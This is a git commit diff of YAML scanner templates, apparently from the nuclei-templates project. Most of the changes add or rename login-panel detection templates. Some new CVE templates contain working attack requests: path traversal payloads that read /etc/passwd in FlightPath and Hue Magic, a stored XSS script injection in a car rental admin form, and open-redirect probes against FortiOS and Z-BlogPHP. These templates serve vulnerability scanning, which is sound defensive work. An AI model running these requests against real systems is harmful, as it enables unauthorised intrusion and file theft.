commit
0a715c0118
|
@ -10,7 +10,6 @@
|
|||
tags:
|
||||
- "fuzz"
|
||||
- "dos"
|
||||
- "misc"
|
||||
|
||||
# files is a list of files to ignore template execution
|
||||
# unless asked for by the user.
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2016-3978
|
||||
|
||||
info:
|
||||
name: FortiOS (Fortinet) - Open Redirect and XSS
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login."
|
||||
reference:
|
||||
- https://seclists.org/fulldisclosure/2016/Mar/68
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-3978
|
||||
tags: cve,cve2016,redirect,fortinet,fortios
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2016-3978
|
||||
cwe-id: CWE-79
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login?redir=http://www.example.com'
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2019-13396
|
||||
info:
|
||||
name: FlightPath Local File Inclusion
|
||||
author: 0x_Akoko,daffainfo
|
||||
severity: high
|
||||
description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/47121
|
||||
- https://www.cvedetails.com/cve/CVE-2019-13396/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-13396
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2019-13396
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2019,flightpath,lfi
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: application/json, text/plain, */*
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: token
|
||||
part: body
|
||||
group: 1
|
||||
internal: true
|
||||
regex:
|
||||
- "idden' name='form_token' value='([a-z0-9]+)'>"
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2020-18268
|
||||
|
||||
info:
|
||||
name: Z-BlogPHP 1.5.2 Open redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php."
|
||||
reference:
|
||||
- https://github.com/zblogcn/zblogphp/issues/216
|
||||
- https://www.cvedetails.com/cve/CVE-2020-18268
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-18268
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2020,redirect,zblogphp,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /zb_system/cmd.php?act=verify HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 81
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
|
||||
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
|
||||
|
||||
- |
|
||||
GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -29,9 +29,9 @@ requests:
|
|||
- "Contact Form 7"
|
||||
part: body
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- '^== Changelog =="'
|
||||
- type: word
|
||||
words:
|
||||
- '== Changelog =='
|
||||
part: body
|
||||
|
||||
- type: regex
|
||||
|
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2021-25864
|
||||
|
||||
info:
|
||||
name: Hue Magic - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: node-red-contrib-huemagic 3.0.0 is affected by hue/assets/..%2F Directory Traversal.in the res.sendFile API, used in file hue-magic.js, to fetch an arbitrary file.
|
||||
reference:
|
||||
- https://github.com/Foddy/node-red-contrib-huemagic/issues/217
|
||||
- https://www.cvedetails.com/cve/CVE-2021-25864
|
||||
metadata:
|
||||
shodan-query: title:"NODE-RED"
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-25864
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2021,huemagic,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,111 @@
|
|||
id: CVE-2021-46005
|
||||
|
||||
info:
|
||||
name: Sourcecodester Car Rental Management System 1.0 - Stored XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/49546
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-46005
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2021-46005
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,sourcecodester,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /admin/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
|
||||
username={{username}}&password={{password}}&login=
|
||||
|
||||
- |
|
||||
POST /admin/post-avehical.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="vehicletitle"
|
||||
|
||||
Test
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="brandname"
|
||||
|
||||
1
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="vehicalorcview"
|
||||
|
||||
</script><script>alert(document.domain)</script>
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="priceperday"
|
||||
|
||||
500
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="fueltype"
|
||||
|
||||
Petrol
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="modelyear"
|
||||
|
||||
2022
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="seatingcapacity"
|
||||
|
||||
5
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img1"; filename="test.png"
|
||||
Content-Type: image/png
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img2"; filename="test.png"
|
||||
Content-Type: image/png
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img3"; filename="test.png"
|
||||
Content-Type: image/png
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img4"; filename="test.png"
|
||||
Content-Type: image/png
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img5"; filename=""
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="submit"
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv--
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,24 @@
|
|||
id: flightpath-panel
|
||||
info:
|
||||
name: FlightPath Panel
|
||||
author: princechaddha
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.title:"flightpath"
|
||||
tags: panel,flightpath
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/login"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Login | FlightPath</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,10 +1,12 @@
|
|||
id: openam-detect
|
||||
id: openam-panel
|
||||
|
||||
info:
|
||||
name: Detect OpenAM and OpenSSO
|
||||
name: OpenAM and OpenSSO Login Panel
|
||||
author: philippedelteil
|
||||
severity: info
|
||||
tags: tech,openam
|
||||
metadata:
|
||||
shodan-query: http.title:"OpenAM"
|
||||
tags: panel,openam,opensso,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -16,6 +18,7 @@ requests:
|
|||
- "{{BaseURL}}/sso/XUI"
|
||||
- "{{BaseURL}}/sso/UI"
|
||||
- "{{BaseURL}}/sso/UI/#login"
|
||||
- "{{BaseURL}}/opensso/UI/Login"
|
||||
- "{{BaseURL}}/openam/UI/login"
|
||||
- "{{BaseURL}}/openam/UI/#loginlogin"
|
||||
- "{{BaseURL}}/openam/UI/Login"
|
|
@ -1,10 +1,12 @@
|
|||
id: opensis-detect
|
||||
|
||||
info:
|
||||
name: OpenSIS Detect
|
||||
name: OpenSIS Login Panel
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
tags: tech,opensis
|
||||
metadata:
|
||||
shodan-query: http.title:"openSIS"
|
||||
tags: panel,opensis,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -12,6 +14,7 @@ requests:
|
|||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/opensis/index.php"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
|
@ -1,10 +1,12 @@
|
|||
id: openx-detect
|
||||
id: openx-panel
|
||||
|
||||
info:
|
||||
name: OpenX detect
|
||||
name: OpenX Login Panel
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
tags: tech,openx
|
||||
metadata:
|
||||
shodan-query: http.title:"OpenX"
|
||||
tags: panel,openx,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -1,22 +1,29 @@
|
|||
id: phpcollab-detect
|
||||
id: phpcollab-panel
|
||||
|
||||
info:
|
||||
name: PhpCollab detect
|
||||
name: PhpCollab Login Panel
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
tags: tech,phpcollab
|
||||
metadata:
|
||||
shodan-query: http.title:"PhpCollab"
|
||||
tags: panel,phpcollab,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/general/login.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<title>PhpCollab</title>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
|
@ -1,10 +1,12 @@
|
|||
id: remkon-manager-detect
|
||||
id: remkon-manager-panel
|
||||
|
||||
info:
|
||||
name: Remkon Device Manager Detect
|
||||
author: pikpikcu
|
||||
name: Remkon Device Manager Login Panel
|
||||
author: pikpikcu,daffainfo
|
||||
severity: info
|
||||
tags: remkon,tech,panel
|
||||
metadata:
|
||||
shodan-query: http.title:"Remkon Device Manager"
|
||||
tags: panel,remkon,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -1,10 +1,12 @@
|
|||
id: sage-detect
|
||||
id: sage-panel
|
||||
|
||||
info:
|
||||
name: Sage X3 Detect
|
||||
author: pikpikcu
|
||||
name: Sage X3 Login Panel
|
||||
author: pikpikcu,daffainfo
|
||||
severity: info
|
||||
tags: tech,sage
|
||||
metadata:
|
||||
shodan-query: http.title:"Sage X3"
|
||||
tags: panel,sage,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -13,11 +15,12 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Sage X3</title>"
|
||||
- "'/auth/sage-id/registerStart'"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
|
@ -0,0 +1,31 @@
|
|||
id: seeddms-panel
|
||||
|
||||
info:
|
||||
name: SeedDMS Login Panel
|
||||
author: pussycat0x,daffainfo
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.title:"SeedDMS"
|
||||
tags: panel,seeddms,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
|
||||
- "{{BaseURL}}/dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'href="/out/out.ViewFolder.php">SeedDMS</a>'
|
||||
- 'href="../out/out.ViewFolder.php?folderid=1">SeedDMS</a>'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,33 @@
|
|||
id: threatq-login
|
||||
|
||||
info:
|
||||
name: ThreatQ login panel
|
||||
author: idealphase
|
||||
severity: info
|
||||
description: ThreatQ serves as an open and extensible threat intelligence platform that allows you to automate the intelligence lifecycle, quickly understand threats, make better decisions and accelerate detection and response
|
||||
reference: https://www.threatq.com/threat-intelligence-platform/
|
||||
tags: panel,threatq
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title ng-bind="PageTitle.getTitle()">ThreatQ</title>'
|
||||
- '<script src="/assets/js/threatq.min.js'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '<script src="/assets/js/threatq.min.js\?(.*)'
|
|
@ -0,0 +1,26 @@
|
|||
id: voipmonitor-panel
|
||||
|
||||
info:
|
||||
name: VoipMonitor panel
|
||||
author: Yanyun
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.title:"VoIPmonitor"
|
||||
tags: panel,voipmonitor,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "appShareUrl = 'share.voipmonitor.org'"
|
||||
- "VoIPmonitor"
|
||||
condition: and
|
|
@ -0,0 +1,37 @@
|
|||
id: wazuh-panel
|
||||
|
||||
info:
|
||||
name: Wazuh Login Panel
|
||||
author: cyllective,daffainfo
|
||||
severity: info
|
||||
description: Wazuh - The Open Source Security Platform
|
||||
reference: https://github.com/wazuh/wazuh
|
||||
metadata:
|
||||
shodan-query: http.title:"Wazuh"
|
||||
tags: panel,wazuh,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/app/login"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"id":"wazuh"'
|
||||
- '"title":"Wazuh"'
|
||||
- '"icon":"plugins/wazuh/img/icon_blue.png"'
|
||||
- '"url":"/app/wazuh"'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '"version":"([0-9.]+)"'
|
|
@ -0,0 +1,32 @@
|
|||
id: webmodule-ee-panel
|
||||
|
||||
info:
|
||||
name: Webmodule Login Panel
|
||||
author: pussycat0x,daffainfo
|
||||
severity: info
|
||||
metadata:
|
||||
google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version"
|
||||
reference: https://www.exploit-db.com/ghdb/7001
|
||||
tags: panel,webmodule-ee,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/webmodule-ee/login.seam"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Webmodule</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- 'Version: ([0-9.]+)'
|
|
@ -0,0 +1,30 @@
|
|||
id: xxljob-panel
|
||||
|
||||
info:
|
||||
name: XXLJOB Admin Login Panel
|
||||
author: pdteam,daffainfo
|
||||
severity: info
|
||||
tags: panel,xxljob,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/xxl-job-admin/toLogin"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<a><b>XXL</b>JOB</a>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '"admin_version":"(.*?)"'
|
|
@ -1,10 +1,12 @@
|
|||
id: yzmcms-detect
|
||||
id: yzmcms-panel
|
||||
|
||||
info:
|
||||
name: YzmCMS Detect
|
||||
author: pikpikcu
|
||||
name: YzmCMS Login Panel
|
||||
author: pikpikcu,daffainfo
|
||||
severity: info
|
||||
tags: yzmcms,tech
|
||||
metadata:
|
||||
shodan-query: http.title:"YzmCMS"
|
||||
tags: panel,yzmcms,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -13,11 +15,13 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Powered By <a href="http://www.yzmcms.com"'
|
||||
- 'Powered By YzmCMS'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: zblogphp-panel
|
||||
|
||||
info:
|
||||
name: Z-BlogPHP Panel
|
||||
author: princechaddha
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.html:"Z-BlogPHP"
|
||||
tags: panel,zblogphp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<meta name="generator" content="Z-BlogPHP'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '<meta name="generator" content="([:A-Z-a-z 0-9.]+)"'
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: AddEventlistener detection
|
||||
author: yavolo
|
||||
severity: info
|
||||
tags: xss
|
||||
tags: xss,misc
|
||||
reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source
|
||||
|
||||
requests:
|
||||
|
@ -14,6 +14,6 @@ requests:
|
|||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'window.addEventListener('
|
||||
part: body
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Apple app site association for harvesting end points
|
||||
author: panch0r3d
|
||||
severity: info
|
||||
tags: misc
|
||||
tags: misc,apple
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -17,17 +17,17 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'applinks'
|
||||
- 'appID'
|
||||
- 'paths'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -11,6 +11,7 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
|
@ -18,3 +19,4 @@ requests:
|
|||
- "Index of /"
|
||||
- "[To Parent Directory]"
|
||||
- "Directory: /"
|
||||
condition: or
|
|
@ -1,20 +0,0 @@
|
|||
id: display-via-header
|
||||
|
||||
info:
|
||||
name: Display Via Header
|
||||
author: geeknik
|
||||
reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Via
|
||||
severity: info
|
||||
tags: misc,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
extractors:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- "Via:.*"
|
|
@ -16,14 +16,14 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "# @package Joomla"
|
||||
- "Joomla"
|
||||
- "Open Source Matters. All rights reserved"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/plain"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -21,9 +21,9 @@ requests:
|
|||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/xml"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -22,9 +22,9 @@ requests:
|
|||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/plain"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -14,7 +14,7 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
|
||||
|
||||
threads: 50
|
||||
threads: 10
|
||||
payloads:
|
||||
path:
|
||||
- /
|
||||
|
|
|
@ -16,9 +16,9 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '2022'
|
||||
part: body
|
||||
negative: true
|
||||
|
||||
- type: regex
|
||||
|
@ -28,10 +28,10 @@ requests:
|
|||
- '© [1-9]\d*'
|
||||
- '© [1-9]\d*'
|
||||
- '© [1-9]\d*'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
name: copyright_year
|
||||
regex:
|
||||
- 'Copyright [1-9]\d*'
|
||||
- '© [1-9]\d*'
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: detect-options-method
|
||||
id: options-method
|
||||
|
||||
info:
|
||||
name: Detect enabled OPTIONS methods
|
||||
name: Allowed Options Method
|
||||
author: pdteam
|
||||
severity: info
|
||||
tags: misc,generic
|
|
@ -9,6 +9,7 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/robots.txt"
|
||||
|
||||
matchers-condition: and
|
||||
redirects: true
|
||||
matchers:
|
||||
|
@ -17,9 +18,9 @@ requests:
|
|||
- "Disallow:"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/plain
|
||||
part: header
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
|
@ -10,20 +10,28 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/.well-known/security.txt"
|
||||
- "{{BaseURL}}/security.txt"
|
||||
- "{{RootURL}}/.well-known/security.txt"
|
||||
- "{{RootURL}}/security.txt"
|
||||
|
||||
stop-at-first-match: true
|
||||
redirects: true
|
||||
max-redirects: 3
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Contact:"
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "len(body) <= 1024 && len(body) > 0"
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
- '(?mi)Contact:(.*)'
|
|
@ -1,25 +0,0 @@
|
|||
id: tabnabbing-check
|
||||
|
||||
info:
|
||||
name: Reverse Tabnabbing
|
||||
author: bolli95
|
||||
severity: info
|
||||
tags: misc
|
||||
reference:
|
||||
- https://owasp.org/www-community/attacks/Reverse_Tabnabbing
|
||||
- https://www.youtube.com/watch?v=TMKZCHYmtD4
|
||||
- https://hackerone.com/reports/211065
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'regex("<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", replace_regex(replace_regex(body, "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", ""), "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", "")) || regex("window\.open\\([^,]+\\)", body)'
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "!contains(tolower(all_headers), 'referrer-policy: no-referrer')"
|
|
@ -15,9 +15,9 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
name: trace-request
|
||||
part: body
|
||||
words:
|
||||
- "TRACE / HTTP"
|
||||
part: body
|
||||
|
||||
- method: OPTIONS
|
||||
path:
|
||||
|
@ -26,6 +26,6 @@ requests:
|
|||
matchers:
|
||||
- type: regex
|
||||
name: options-request
|
||||
part: header
|
||||
regex:
|
||||
- "(?i)Allow: [A-Z,]*TRACE"
|
||||
part: header
|
||||
|
|
|
@ -0,0 +1,36 @@
|
|||
id: apollo-server-detect
|
||||
|
||||
info:
|
||||
name: Apollo Server GraphQL introspection detection
|
||||
author: idealphase
|
||||
severity: info
|
||||
description: Apollo Server is a community-maintained open-source GraphQL server. It works with many Node.js HTTP server frameworks, or can run on its own with a built-in Express server. Apollo Server works with any GraphQL schema built with GraphQL.js--or define a schema's type definitions using schema definition language (SDL).
|
||||
reference: https://github.com/apollographql/apollo-server
|
||||
tags: apollo,tect,graphql
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/graphql"
|
||||
|
||||
headers:
|
||||
